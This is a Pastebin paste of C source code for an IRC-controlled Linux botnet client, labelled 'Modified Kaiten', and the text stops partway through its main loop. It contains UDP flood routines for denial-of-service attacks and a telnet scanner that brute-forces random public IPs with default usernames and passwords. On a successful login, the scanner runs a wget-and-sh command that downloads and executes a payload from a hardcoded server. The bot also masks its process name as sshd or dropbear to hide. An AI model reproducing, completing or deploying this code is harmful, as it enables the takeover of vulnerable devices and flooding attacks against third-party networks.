Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #undef IDENT
- #define FAKENAME "/usr/sbin/dropbear"
- #define CHAN "##ez"
- #define KEY ""
- #define PORT "443"
- #define PASS ""
- #define STD2_STRING "dts"
- #define STD2_SIZE 50
- #define PREFIX "[BOT]"
- #define PR_SET_NAME 15
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define OPT_SGA 3
- int numservers=1;
- char *servers[] = {
- "208.67.1.62",
- (void*)0
- };
- #include <stdarg.h>
- #include <errno.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <strings.h>
- #include <netinet/in.h>
- #include <unistd.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <signal.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <time.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <net/if.h>
- #include <netinet/tcp.h>
- #include <netinet/udp.h>
- #include <netinet/ip.h>
- #include <sys/utsname.h>
- char *usernames[] = {"root\0", "admin\0", "user\0", "login\0", "guest\0", "support\0", "cisco\0"};
- char *passwords[] = {"root\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0", "support\0", "vizxv\0", "cisco\0"};
- int sock,changeservers=0;
- char *server, *chan, *key, *nick, *ident, *prefix, *user, *pass, disabled=0, udpTry = 0, *adminuser1="Fine";
- unsigned int *pids;
- uint32_t scanPid;
- unsigned long spoofs=0, spoofsm=0, numpids=0;
- int strwildmatch(unsigned char* pattern, unsigned char* string) {
- switch((unsigned char)*pattern) {
- case '\0': return *string;
- case 'b': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case 'o': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case 't': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case 'B': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case 'O': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case 'T': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case '?': return !(*string && !strwildmatch(pattern+1, string+1));
- default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
- }
- }
- void trim(char *str)
- {
- int i;
- int begin = 0;
- int end = strlen(str) - 1;
- while (isspace(str[begin])) begin++;
- while ((end >= begin) && isspace(str[end])) end--;
- for (i = begin; i <= end; i++) str[i - begin] = str[i];
- str[i - begin] = '\0';
- }
- static void printchar(unsigned char **str, int c)
- {
- if (str) {
- **str = c;
- ++(*str);
- }
- else (void)write(1, &c, 1);
- }
- static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
- {
- register int pc = 0, padchar = ' ';
- if (width > 0) {
- register int len = 0;
- register const unsigned char *ptr;
- for (ptr = string; *ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad & PAD_ZERO) padchar = '0';
- }
- if (!(pad & PAD_RIGHT)) {
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- }
- for ( ; *string ; ++string) {
- printchar (out, *string);
- ++pc;
- }
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
- {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0) {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints (out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0) {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN-1;
- *s = '\0';
- while (u) {
- t = u % b;
- if( t >= 10 )
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg) {
- if( width && (pad & PAD_ZERO) ) {
- printchar (out, '-');
- ++pc;
- --width;
- }
- else {
- *--s = '-';
- }
- }
- return pc + prints (out, s, width, pad);
- }
- static int print(unsigned char **out, const unsigned char *format, va_list args )
- {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (; *format != 0; ++format) {
- if (*format == '%') {
- ++format;
- width = pad = 0;
- if (*format == '\0') break;
- if (*format == '%') goto out;
- if (*format == '-') {
- ++format;
- pad = PAD_RIGHT;
- }
- while (*format == '0') {
- ++format;
- pad |= PAD_ZERO;
- }
- for ( ; *format >= '0' && *format <= '9'; ++format) {
- width *= 10;
- width += *format - '0';
- }
- if( *format == 's' ) {
- register char *s = (char *)va_arg( args, int );
- pc += prints (out, s?s:"(null)", width, pad);
- continue;
- }
- if( *format == 'd' ) {
- pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
- continue;
- }
- if( *format == 'x' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'X' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
- continue;
- }
- if( *format == 'u' ) {
- pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'c' ) {
- scr[0] = (unsigned char)va_arg( args, int );
- scr[1] = '\0';
- pc += prints (out, scr, width, pad);
- continue;
- }
- }
- else {
- out:
- printchar (out, *format);
- ++pc;
- }
- }
- if (out) **out = '\0';
- va_end( args );
- return pc;
- }
- int szprintf(unsigned char *out, const unsigned char *format, ...)
- {
- va_list args;
- va_start( args, format );
- return print( &out, format, args );
- }
- int negotiate(int sock, unsigned char *buf, int len)
- {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock, &c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock, &c, 1, MSG_NOSIGNAL);
- send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int sclose(int fd)
- {
- if(3 > fd) return 1;
- close(fd);
- return 0;
- }
- int Send(int sock, char *words, ...) {
- static char textBuffer[1024];
- va_list args;
- va_start(args, words);
- vsprintf(textBuffer, words, args);
- va_end(args);
- return write(sock,textBuffer,strlen(textBuffer));
- }
- unsigned int host2ip(char *sender,char *hostname) {
- static struct in_addr i;
- struct hostent *h;
- if((i.s_addr = inet_addr(hostname)) == -1) {
- if((h = gethostbyname(hostname)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
- exit(0);
- }
- bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
- }
- return i.s_addr;
- }
- int mfork(char *sender) {
- unsigned int parent, *newpids, i;
- if (disabled == 1) {
- Send(sock,"NOTICE %s :Unable to comply.\n",sender);
- return 1;
- }
- parent=fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
- newpids[numpids-1]=parent;
- free(pids);
- pids=newpids;
- return parent;
- }
- void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
- char *makestring() {
- char *tmp;
- int len=(rand()%5)+4,i;
- FILE *file;
- tmp=(char*)malloc(len+1);
- memset(tmp,0,len+1);
- char *pre;
- if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
- else {
- int a=((rand()*rand())%45402)+1;
- char buf[1024];
- for (i=0;i<a;i++) fgets(buf,1024,file);
- memset(buf,0,1024);
- fgets(buf,1024,file);
- filter(buf);
- memcpy(tmp,buf,len);
- fclose(file);
- }
- return tmp;
- }
- void identd() {
- int sockname,sockfd,sin_size,tmpsock,i;
- struct sockaddr_in my_addr,their_addr;
- char szBuffer[1024];
- if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(443);
- my_addr.sin_addr.s_addr = INADDR_ANY;
- memset(&(my_addr.sin_zero), 0, 8);
- if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
- if (listen(sockfd, 1) == -1) return;
- if (fork() == 0) return;
- sin_size = sizeof(struct sockaddr_in);
- if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
- for(;;) {
- fd_set bla;
- struct timeval timee;
- FD_ZERO(&bla);
- FD_SET(tmpsock,&bla);
- timee.tv_sec=timee.tv_usec=60;
- if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
- if (FD_ISSET(tmpsock,&bla)) break;
- }
- i = recv(tmpsock,szBuffer,1024,0);
- if (i <= 0 || i >= 20) exit(0);
- szBuffer[i]=0;
- if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
- if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
- Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
- close(tmpsock);
- close(sockfd);
- exit(0);
- }
- int matchPrompt(char *bufStr)
- {
- char *prompts = ":>%$#\0";
- int bufLen = strlen(bufStr);
- int i, q = 0;
- for(i = 0; i < strlen(prompts); i++)
- {
- while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
- if(*(bufStr + bufLen - q) == prompts[i]) return 1;
- }
- return 0;
- }
- int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
- {
- int bufferUsed = initialIndex, got = 0, found = 0;
- fd_set myset;
- struct timeval tv;
- tv.tv_sec = timeout;
- tv.tv_usec = timeoutusec;
- unsigned char *initialRead = NULL;
- while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
- {
- FD_ZERO(&myset);
- FD_SET(fd, &myset);
- if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
- initialRead = buffer + bufferUsed;
- got = recv(fd, initialRead, 1, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(*initialRead == 0xFF)
- {
- got = recv(fd, initialRead + 1, 2, 0);
- if(got == -1 || got == 0) return 0;
- bufferUsed += got;
- if(!negotiate(fd, initialRead, 3)) return 0;
- } else {
- if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
- }
- }
- if(found) return 1;
- return 0;
- }
- //8888888 8888888b. .d8888b.
- // 888 888 Y88b d88P Y88b
- // 888 888 888 Y88b.
- // 888 888 d88P "Y888b. .d8888b 8888b. 88888b. 88888b. .d88b. 888d888
- // 888 8888888P" "Y88b. d88P" "88b 888 "88b 888 "88b d8P Y8b 888P"
- // 888 888 "888 888 .d888888 888 888 888 888 88888888 888
- // 888 888 Y88b d88P Y88b. 888 888 888 888 888 888 Y8b. 888
- //8888888 888 "Y8888P" "Y8888P "Y888888 888 888 888 888 "Y8888 888
- static uint8_t ipState[5];
- in_addr_t getRandomPublicIP()
- {
- if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
- {
- ipState[1]++;
- ipState[2]++;
- ipState[3]++;
- ipState[4]++;
- char ip[16];
- szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
- return inet_addr(ip);
- }
- ipState[1] = 0;
- ipState[2] = 0;
- ipState[3] = 0;
- ipState[4] = 0;
- while(
- (ipState[1] == 0) ||
- (ipState[1] == 10) ||
- (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 169||
- (ipState[1] == 169 && ipState[2] == 254) ||
- (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
- (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
- (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
- (ipState[1] == 192 && ipState[2] == 168) ||
- (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
- (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
- (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
- (ipState[1] >= 224)
- )
- ){
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- ipState[4] = rand() % 255;
- }
- char ip[16];
- szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]));
- return inet_addr(ip);
- }
- //STD Attack
- void std(int sock, char *sender, int argc, char **argv) {
- if (mfork(sender) != 0) return;
- if (argc < 3) {
- Send(sock,"PRIVMSG %s :>bot +std <target> <port> <secs>\n",chan);
- exit(0);
- }
- unsigned long secs;
- int iSTD_Sock;
- iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
- time_t start = time(NULL);
- secs = atol(argv[3]);
- Send(sock,"PRIVMSG %s :[STD]Hitting %s!\n",chan,argv[1]);
- struct sockaddr_in sin;
- struct hostent *hp;
- hp = gethostbyname(argv[1]);
- bzero((char*) &sin,sizeof(sin));
- bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
- sin.sin_family = hp->h_addrtype;
- sin.sin_port = atol(argv[2]);
- unsigned int a = 0;
- while(1){
- if (a >= 50)
- {
- send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
- connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
- if (time(NULL) >= start + secs)
- {
- Send(sock, "PRIVMSG %s :[STD]Done hitting %s!\n", chan, argv[1]);
- close(iSTD_Sock);
- exit(0);
- }
- a = 0;
- }
- a++;
- }
- }
- void stop(int sock, char *sender, int argc, char **argv){
- unsigned long i;
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- if (sender) Send(sock,"PRIVMSG %s :Killing pid %d.\n",chan,pids[i]);
- kill(pids[i],9);
- }
- }
- }
- void StartTheLelz(int sock, char *sender, int argc, char **argv)
- {
- Send(sock,"PRIVMSG %s :Starting Scanner.\n",chan);
- if (mfork(sender) != 0) return;
- int max = (getdtablesize() / 4) * 3, i, res;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- max = max > 512 ? 512 : max;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- struct telstate_t
- {
- int fd;
- uint32_t ip;
- uint8_t state;
- uint8_t complete;
- uint8_t usernameInd;
- uint8_t passwordInd;
- uint32_t totalTimeout;
- uint16_t bufUsed;
- char *sockbuf;
- } fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
- struct timeval timeout;
- timeout.tv_sec = 5;
- timeout.tv_usec = 0;
- while(1)
- {
- for(i = 0; i < max; i++)
- {
- switch(fds[i].state)
- {
- case 0:
- {
- memset(fds[i].sockbuf, 0, 1024);
- if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
- else {
- fds[i].passwordInd++;
- if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
- if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));
- setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
- if(fds[i].fd == -1) { continue; }
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; }
- else { fds[i].state = 1; fds[i].totalTimeout = 0; }
- }
- break;
- case 1:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- FD_ZERO(&myset);
- FD_SET(fds[i].fd, &myset);
- tv.tv_sec = 0;
- tv.tv_usec = 10000;
- res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
- if(res == 1)
- {
- lon = sizeof(int);
- valopt = 0;
- getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if(valopt)
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- } else {
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
- fds[i].totalTimeout = 0;
- fds[i].bufUsed = 0;
- memset(fds[i].sockbuf, 0, 1024);
- fds[i].state = 2;
- continue;
- }
- } else if(res == -1)
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- if(fds[i].totalTimeout + 5 < time(NULL)) //was if(fds[i].totalTimeout + 5 < time(NULL))
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- }
- break;
- case 2:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- if(matchPrompt(fds[i].sockbuf)) {
- fds[i].state = 7;
- }
- if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
- {
- fds[i].totalTimeout = 0;
- fds[i].bufUsed = 0;
- memset(fds[i].sockbuf, 0, 1024);
- fds[i].state = 3;
- continue;
- } else {
- fds[i].bufUsed = strlen(fds[i].sockbuf);
- }
- if(fds[i].totalTimeout + 15 < time(NULL))
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- }
- break;
- case 3:
- {
- if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- fds[i].state = 4;
- }
- break;
- case 4:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- if(readUntil(fds[i].fd, "assword:", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
- {
- fds[i].totalTimeout = 0;
- fds[i].bufUsed = 0;
- if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
- else fds[i].state = 7;
- memset(fds[i].sockbuf, 0, 1024);
- continue;
- } else {
- if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
- fds[i].bufUsed = strlen(fds[i].sockbuf);
- }
- if(fds[i].totalTimeout + 8 < time(NULL)) //was if(fds[i].totalTimeout + 8 < time(NULL))
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- }
- break;
- case 5:
- {
- if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- fds[i].state = 6;
- }
- break;
- case 6:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- if(readUntil(fds[i].fd, "ncorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
- {
- fds[i].totalTimeout = 0;
- fds[i].bufUsed = 0;
- if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
- if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- else fds[i].state = 7;
- memset(fds[i].sockbuf, 0, 1024);
- continue;
- } else {
- fds[i].bufUsed = strlen(fds[i].sockbuf);
- }
- if(fds[i].totalTimeout + 15 < time(NULL))
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- }
- break;
- case 7:
- {
- if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
- fds[i].state = 8;
- }
- break;
- case 8:
- {
- if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
- if(send(fds[i].fd, "cd /tmp; wget http://208.67.1.62/bins.sh; sh bins.sh; rm -rf bins.sh\r\n", 70, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; memset(fds[i].sockbuf, 0, 1024); continue; }
- if(fds[i].totalTimeout + 35 < time(NULL))
- {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- }
- }
- break;
- }
- }
- }
- }
- void unknown(int sock, char *sender, int argc, char **argv) {
- int flag=1,fd,i;
- unsigned long secs;
- char *buf=(char*)malloc(9216);
- struct hostent *hp;
- struct sockaddr_in in;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if (argc != 2) {
- Send(sock,"PRIVMSG %s :>bot +unknown <target> <secs>\n",chan);
- exit(0);
- }
- secs=atol(argv[2]);
- memset((void*)&in,0,sizeof(struct sockaddr_in));
- in.sin_addr.s_addr=host2ip(sender,argv[1]);
- in.sin_family = AF_INET;
- Send(sock,"PRIVMSG %s :[UNK]Hitting %s!\n",chan,argv[1]);
- while(1) {
- in.sin_port = rand();
- if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0){
- } else {
- flag=1;
- ioctl(fd,FIONBIO,&flag);
- sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
- close(fd);
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) break;
- i=0;
- }
- i++;
- }
- Send(sock,"PRIVMSG %s :[UNK]Done hitting %s!\n",chan,argv[1]);
- close(fd);
- exit(0);
- }
- //Kill the bot
- void killsec(int sock, char *sender, int argc, char **argv) {
- if(strcasecmp(adminuser1,sender) == 0){
- kill(0,9);
- } else {
- Send(sock,"PRIVMSG %s :Nice try...\n", chan);
- }
- }
- struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
- { "+std" , std },
- { "+stop" , stop },
- { "+unknown" , unknown },
- { "+scanner" , StartTheLelz },
- { "GikbsyigbIGY" , killsec },
- { (char *)0, (void (*)(int,char *,int,char **))0 } };
- void _PRIVMSG(int sock, char *sender, char *str) {
- int i;
- char *to, *message;
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- to=str;
- message=str+i+2;
- for (i=0;i<strlen(sender) && sender[i] != '!';i++);
- sender[i]=0;
- if (*message == '>' && !strcasecmp(to,chan)) {
- char *params[12], name[1024]={0};
- int num_params=0, m;
- message++;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- message[i]=0;
- if (strwildmatch(message,nick)) return;
- message+=i+1;
- m=strlen(message);
- for (i=0;i<m;i++) {
- if (*message == ' ' || *message == 0) break;
- name[i]=*message;
- message++;
- }
- for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
- num_params++;
- if (num_params > 10) num_params=10;
- params[0]=name;
- params[num_params+1]="\0";
- m=1;
- while (*message != 0) {
- message++;
- if (m >= num_params) break;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- params[m]=(char*)malloc(i+1);
- strncpy(params[m],message,i);
- params[m][i]=0;
- m++;
- message+=i;
- }
- for (m=0; flooders[m].cmd != (char *)0; m++) {
- if (!strcasecmp(flooders[m].cmd,name)) {
- flooders[m].func(sock,sender,num_params-1,params);
- for (i=1;i<num_params;i++) free(params[i]);
- return;
- }
- }
- }
- }
- void _376(int sock, char *sender, char *str) {
- Send(sock,"MODE %s +pixB\n",nick);
- Send(sock,"JOIN %s :%s\n",chan,key);
- Send(sock,"WHO %s\n",nick);
- }
- void _PING(int sock, char *sender, char *str) {
- Send(sock,"PONG %s\n",str);
- }
- void _352(int sock, char *sender, char *str) {
- int i,d;
- char *msg=str;
- struct hostent *hostm;
- unsigned long m;
- for (i=0,d=0;d<5;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if (!strcasecmp(msg,nick) && !spoofsm) {
- msg=str;
- for (i=0,d=0;d<3;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if ((m = inet_addr(msg)) == -1) {
- if ((hostm=gethostbyname(msg)) == NULL) {
- Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
- return;
- }
- memcpy((char*)&m, hostm->h_addr, hostm->h_length);
- }
- ((char*)&spoofs)[3]=((char*)&m)[0];
- ((char*)&spoofs)[2]=((char*)&m)[1];
- ((char*)&spoofs)[1]=((char*)&m)[2];
- ((char*)&spoofs)[0]=0;
- spoofsm=256;
- }
- }
- void _433(int sock, char *sender, char *str) {
- free(nick);
- char tempnick[50];
- char *strpref = PREFIX;
- char *genname = makestring();
- strcpy(tempnick,strpref);
- strcat(tempnick,genname);
- nick=tempnick;
- }
- struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
- { "352", _352 },
- { "376", _376 },
- { "433", _433 },
- { "422", _376 },
- { "PRIVMSG", _PRIVMSG },
- { "PING", _PING },
- { (char *)0, (void (*)(int,char *,char *))0 } };
- void con() {
- struct sockaddr_in srv;
- unsigned long ipaddr,start;
- int flag;
- struct hostent *hp;
- start:
- sock=-1;
- flag=1;
- if (changeservers == 0) server=servers[rand()%numservers];
- changeservers=0;
- while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
- if (inet_addr(server) == 0 || inet_addr(server) == -1) {
- if ((hp = gethostbyname(server)) == NULL) {
- server=NULL;
- close(sock);
- goto start;
- }
- bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
- }
- else srv.sin_addr.s_addr=inet_addr(server);
- srv.sin_family = AF_INET;
- srv.sin_port = htons(443);
- ioctl(sock,FIONBIO,&flag);
- start=time(NULL);
- while(time(NULL)-start < 10) {
- errno=0;
- if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
- setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
- setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
- setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
- return;
- }
- if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
- sleep(1);
- }
- server=NULL;
- close(sock);
- goto start;
- }
- int main(int argc, char *argv[]) {
- int on,i;
- char cwd[256],*str;
- FILE *file;
- if (fork()) exit(0);
- char *mynameis = "";
- if(access("/usr/bin/python", F_OK) != -1){
- mynameis = "sshd";
- } else {
- mynameis = "/usr/sbin/dropbear";
- }
- strncpy(argv[0],"",strlen(argv[0]));
- sprintf(argv[0], mynameis);
- prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
- srand((time(NULL) ^ getpid()) + getppid());
- char tempnick[50];
- char *strpref = PREFIX;
- char *genname = makestring();
- strcpy(tempnick,strpref);
- strcat(tempnick,genname);
- nick=tempnick;
- ident="DaVoid";
- user="Modified Kaiten";
- chan=CHAN;
- key=KEY;
- pass=PASS;
- server=NULL;
- sa:
- #ifdef IDENT
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- kill(pids[i],9);
- waitpid(pids[i],NULL,WNOHANG);
- }
- }
- pids=NULL;
- numpids=0;
- identd();
- #endif
- con();
- Send(sock,"PASS %s\n", pass);
- Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
- while(1) {
- unsigned long i;
- fd_set n;
- struct timeval tv;
- FD_ZERO(&n);
- FD_SET(sock,&n);
- tv.tv_sec=60*20;
- tv.tv_usec=0;
